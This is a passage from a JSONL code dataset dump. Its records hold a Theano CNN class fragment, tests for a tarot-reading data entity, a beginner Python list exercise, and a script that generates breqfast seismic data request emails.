self.hidden_layer_input = self.conv_layer.output.flatten(2)\n\n # construct a fully-connected sigmoidal layer\n self.hidden_layer = HiddenLayer(\n rng=self.numpy_rng,\n input=self.hidden_layer_input,\n n_in=self.filter_sizes[0] * 12 * 12,\n n_out=500,\n activation=T.tanh\n )\n self.params.extend(self.hidden_layer.params)\n\n # classify the values of the fully-connected sigmoidal layer\n self.logistic_regression_layer = LogisticRegression(input=self.hidden_layer.output, n_in=500, n_out=self.n_out)\n self.params.extend(self.logistic_regression_layer.params)\n \n ##################################\n # Training Step Helper Functions #\n ##################################\n\n def get_cost(self, y, L1_reg, L2_reg):\n # loss function (without regularization)\n self.loss = negative_log_likelihood( \n self.logistic_regression_layer.p_y_given_x, \n y)\n\n # L1 norm ; one regularization option is to enforce L1 norm to\n # be small\n self.L1 = L1_reg * ( abs(self.conv_layer.W).sum()\n + abs(self.hidden_layer.W).sum()\n + abs(self.logistic_regression_layer.W).sum()\n )\n\n # square of L2 norm ; one regularization option is to enforce\n # square of L2 norm to be small\n self.L2_sqr = L2_reg * ( (self.conv_layer.W ** 2).sum()\n + (self.hidden_layer.W ** 2).sum()\n + (self.logistic_regression_layer.W ** 2).sum()\n )\n\n self.cost = self.loss + self.L1 + self.L2_sqr\n return self.cost\n\n def get_updates(self, cost, learning_rate):\n # compute the gradient of cost with respect to theta (sorted in params)\n # the resulting gradients will be stored in a list grads\n grads = [T.grad(cost, param) for param in self.params]\n\n updates = [\n (param, param - learning_rate * gparam)\n for param, gparam in zip(self.params, grads)\n ]\n return updates\n\n def get_cost_updates(self, y, L1_reg, L2_reg, learning_rate):\n cost = self.get_cost(y, L1_reg, L2_reg)\n updates = self.get_updates(cost, learning_rate)\n return cost, updates\n\n ##############################################\n # Accessor Methods for training step outputs #\n ##############################################\n\n def errors(self, y):\n return self.logistic_regression_layer.errors(y)\n\n def get_latest_cost(self):\n return self.cost\n\n def get_loss(self):\n return self.loss\n\n def get_L1(self):\n return self.L1\n\n def get_L2_sqr(self):\n return self.L2_sqr","sub_path":"scripts/Theano2/CNN.py","file_name":"CNN.py","file_ext":"py","file_size_in_byte":4616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"245048063","text":"from datetime import datetime\nfrom typing import Dict\nfrom dynamodb_tools.entity import Entity, get_class_properties\nfrom chalicelib.reading import Reading\n\n\ndef test_reading_new():\n question = \"Will Donald Trump win a second term in office?\"\n username = \"john.smith@company.com\"\n deck = \"modernTarot\"\n layout = \"worldEvents\"\n reading = Reading.new(question=question,\n username=username,\n deck=deck,\n layout=layout)\n assert reading.question == question\n assert reading.deck == deck\n assert reading.layout == layout\n assert len(reading.id) == 10\n assert isinstance(reading.date_created, datetime)\n assert reading.date_modified is None\n d = reading.date_created\n year = d.year\n month = d.strftime('%m')\n day = d.strftime('%d')\n hour = d.strftime('%H')\n minute = d.strftime('%M')\n second = d.strftime('%S')\n utc_tight_zulu = f\"{year}{month}{day}T{hour}{minute}{second}Z\"\n assert reading.pk == f\"reading~{reading.username}\"\n assert reading.sk == f\"reading~{utc_tight_zulu}~{reading.id}\"\n\n\ndef test_reading_load_and_dump():\n data = {\n \"pk\": \"reading~dave.jones@some.org\",\n \"sk\": \"reading~20191202T090000Z~d4e5f6\",\n \"id\": \"d4e5f6\",\n \"entity\": \"reading\",\n \"question\": \"Will Donald Trump win a second term in office?\",\n \"username\": \"dave.jones@some.org\",\n \"dateCreated\": \"20191202T090000Z\",\n \"dateModified\": \"20191202T090230Z\",\n \"deck\": \"traditionalTarot\",\n \"layout\": \"quick\",\n \"placements\": {},\n \"notes\": None\n }\n reading = Reading.load(data)\n assert isinstance(reading.date_created, datetime)\n assert isinstance(reading.date_modified, datetime)\n assert reading.pk == data[\"pk\"]\n assert reading.sk == data[\"sk\"]\n dumped = reading.dump()\n assert dumped == data\n\n","sub_path":"tests/test_reading.py","file_name":"test_reading.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"645892693","text":"'''\ncadena = 'Este es un atributo '\ncadenaNueva = cadena + 'nuevo'\nprint('Flujo : ', cadenaNueva)\nprint(cadenaNueva[0:4])\n'''\n\n# distancias = (('pereira','bogota',230),('pereira','cali',260))\n# print(distancias)\n\nitinerario = [['Santa Marta',1],['Cartagena',2],['San Andrés',4]]\nitinerario.append(['Providencia',2])\nitinerario.pop(1)\nitinerario[0][1] += 1\nitinerario[0],itinerario[-1] = itinerario[-1],itinerario[0]\n# itinerario[-1] = itinerario[0]\nprint(itinerario)\n\n'''\nfor posicion, valor in enumerate(itinerario):\n print('posicion: ', posicion)\n print('valor', valor[0])\n'''\n\nfor iti in range(len(itinerario)):\n print('posicion: ', iti)\n print('valor: ', itinerario[iti])\n\n\n\n","sub_path":"Mision-TIC-GRUPO-09-master(16-06-21)/semana 3/ejercicio9.py","file_name":"ejercicio9.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"57011265","text":"\"\"\"\nmail content sent by breqfast.\n\"\"\"\nimport sh\nimport obspy\nimport pandas as pd\n\ntemplate = \"\"\".NAME ziyixi\n.INST Michigan State University\n.MAIL CMSE, MSU, East Lansing, MI, 48824\n.EMAIL ziyixi@mail.ustc.edu.cn\n.PHONE 517 505-0802\n.FAX 517 505-0802\n.MEDIA FTP\n.ALTERNATE MEDIA 1/2\" tape - 6250\n.ALTERNATE MEDIA EXABYTE\n.LABEL {label}\n.SOURCE ~NEIC PDE~Jan 1990 PDE~National Earthquake Information Center - USGS DOI~\n.HYPO ~{year} {month} {day} {hour} {minute} {second}~ {latitude}~ {longitude}~{depth}~18~216~{region}~\n.MAGNITUDE ~{magnitude}~mw~\n.QUALITY B\n.END\n{station_information}\n\"\"\"\n\n\ndef create_mail_contents():\n mail_list = []\n events = obspy.read_events(\"./Japan_slab/*\")\n sh.mkdir(\"-p\", \"./mails_ziyixi\")\n\n stations = pd.read_csv(\n \"./fdsn_stations\",\n sep=\"\\s+\",\n names=[\"station\", \"network\", \"lat\", \"lon\", \"elv\", \"dep\"],\n )\n\n for item in events:\n station_information = \"\"\n starttime = item.origins[0].time - 2 * 60\n endtime = item.origins[0].time + 40 * 60\n for index, row in stations.iterrows():\n station_information += f\"{row.station} {row.network} {starttime.year} {starttime.month} {starttime.day} {starttime.hour} {starttime.minute} {round(starttime.second + (1e-6) * starttime.microsecond,2)} {endtime.year} {endtime.month} {endtime.day} {endtime.hour} {endtime.minute} {round(endtime.second + (1e-6) * endtime.microsecond,2)} 2 BH? HH?\\n\"\n\n mail_content = template.format(\n label=item.origins[0].resource_id.id.split(\"/\")[2],\n year=item.origins[0].time.year,\n month=item.origins[0].time.month,\n day=item.origins[0].time.day,\n hour=item.origins[0].time.hour,\n minute=item.origins[0].time.minute,\n second=round(\n item.origins[0].time.second +\n (1e-6) * item.origins[0].time.microsecond,\n 2,\n ),\n latitude=item.origins[0].latitude,\n longitude=item.origins[0].longitude,\n depth=item.origins[0].depth / 1000,\n region=item.origins[0].region,\n magnitude=item.magnitudes[0].mag,\n station_information=station_information,\n )\n\n with open(f\"./mails_ziyixi/{item.origins[0].resource_id.id.split('/')[2]}\", \"w\") as f:\n f.write(mail_content)\n\n\nif __name__ == \"__main__\":\n create_mail_contents()\n","sub_path":"download_data/fdsn/breqfast/build_breqfast_mailcontent.py","file_name":"build_breqfast_mailcontent.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
    {}{}{}{}
    {}{}{}{}